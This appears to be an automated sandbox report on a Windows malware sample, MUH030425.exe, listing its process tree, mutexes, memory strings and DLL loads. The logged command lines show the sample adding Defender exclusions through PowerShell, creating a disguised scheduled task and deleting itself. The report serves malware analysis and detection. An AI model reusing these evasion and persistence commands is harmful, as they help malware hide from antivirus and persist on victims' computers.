              Source: maintenanceservice.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msdtc.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msiexec.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: PerceptionSimulationService.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: perfhost.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: Locator.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: MsSense.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: SensorDataService.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: snmptrap.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: Spectrum.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: ssh-agent.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: TieringEngineService.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AgentService.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: vds.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: VSSVC.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: wbengine.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: WmiApSrv.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: wmpnetwk.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: SearchIndexer.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: MUH030425.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: wBBaygjR.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: classification engineClassification label: mal100.spre.phis.troj.spyw.expl.evad.winEXE@38/247@97/21
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00416B94 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,GetCurrentProcessId,8_2_00416B94
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040A4A4 CoCreateInstance,8_2_0040A4A4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_02C4CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,8_2_02C4CBD0
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log
              Source: C:\Users\user\Desktop\MUH030425.exeFile created: C:\Users\user\AppData\Roaming\wBBaygjR.exeJump to behavior
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeMutant created: NULL
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6244
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-eab56394c76d7db562e80848-b
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6424:120:WilError_03
              Source: C:\Windows\System32\alg.exeMutant created: \BaseNamedObjects\Global\Multiarch.m0yv-eab56394c76d7db59ea72c54-b
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8136:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3276:120:WilError_03
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-eab56394c76d7db5-inf
              Source: C:\Users\user\Desktop\MUH030425.exeMutant created: \Sessions\1\BaseNamedObjects\mUCKUiGyimzufHA
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1420:120:WilError_03
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\AFA7A44E6-9414907A-9D9EAFCE-3ADD0605-3F764E8B
              Source: C:\Users\user\Desktop\MUH030425.exeFile created: C:\Users\user\AppData\Local\Temp\tmpD1E0.tmpJump to behavior
              Source: MUH030425.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: MUH030425.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
              Source: C:\Users\user\Desktop\MUH030425.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT ALL id FROM %s WHERE %s;
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT ALL id FROM %s;
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
              Source: MUH030425.exeVirustotal: Detection: 33%
              Source: MUH030425.exeReversingLabs: Detection: 28%
              Source: C:\Users\user\Desktop\MUH030425.exeFile read: C:\Users\user\Desktop\MUH030425.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\MUH030425.exe "C:\Users\user\Desktop\MUH030425.exe"
              Source: C:\Users\user\Desktop\MUH030425.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MUH030425.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\MUH030425.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wBBaygjR.exe"
              Source: C:\Users\user\Desktop\MUH030425.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wBBaygjR" /XML "C:\Users\user\AppData\Local\Temp\tmpD1E0.tmp"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\MUH030425.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
              Source: unknownProcess created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
              Source: unknownProcess created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
              Source: unknownProcess created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
              Source: C:\Users\user\Desktop\MUH030425.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6244 -s 1792
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\wBBaygjR.exe C:\Users\user\AppData\Roaming\wBBaygjR.exe
              Source: unknownProcess created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
              Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
              Source: unknownProcess created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
              Source: unknownProcess created: C:\Windows\System32\msdtc.exe C:\Windows\System32\msdtc.exe
              Source: unknownProcess created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
              Source: unknownProcess created: C:\Windows\SysWOW64\perfhost.exe C:\Windows\SysWow64\perfhost.exe
              Source: unknownProcess created: C:\Windows\System32\Locator.exe C:\Windows\system32\locator.exe
              Source: unknownProcess created: C:\Windows\System32\SensorDataService.exe C:\Windows\System32\SensorDataService.exe
              Source: unknownProcess created: C:\Windows\System32\snmptrap.exe C:\Windows\System32\snmptrap.exe
              Source: unknownProcess created: C:\Windows\System32\Spectrum.exe C:\Windows\system32\spectrum.exe
              Source: unknownProcess created: C:\Windows\System32\OpenSSH\ssh-agent.exe C:\Windows\System32\OpenSSH\ssh-agent.exe
              Source: unknownProcess created: C:\Windows\System32\TieringEngineService.exe C:\Windows\system32\TieringEngineService.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
              Source: unknownProcess created: C:\Windows\System32\AgentService.exe C:\Windows\system32\AgentService.exe
              Source: unknownProcess created: C:\Windows\System32\vds.exe C:\Windows\System32\vds.exe
              Source: unknownProcess created: C:\Windows\System32\wbengine.exe "C:\Windows\system32\wbengine.exe"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "RegSvcs.exe"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
              Source: C:\Users\user\Desktop\MUH030425.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MUH030425.exe"Jump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wBBaygjR.exe"Jump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wBBaygjR" /XML "C:\Users\user\AppData\Local\Temp\tmpD1E0.tmp"Jump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "RegSvcs.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
              Source: C:\Users\user\Desktop\MUH030425.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\MUH030425.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
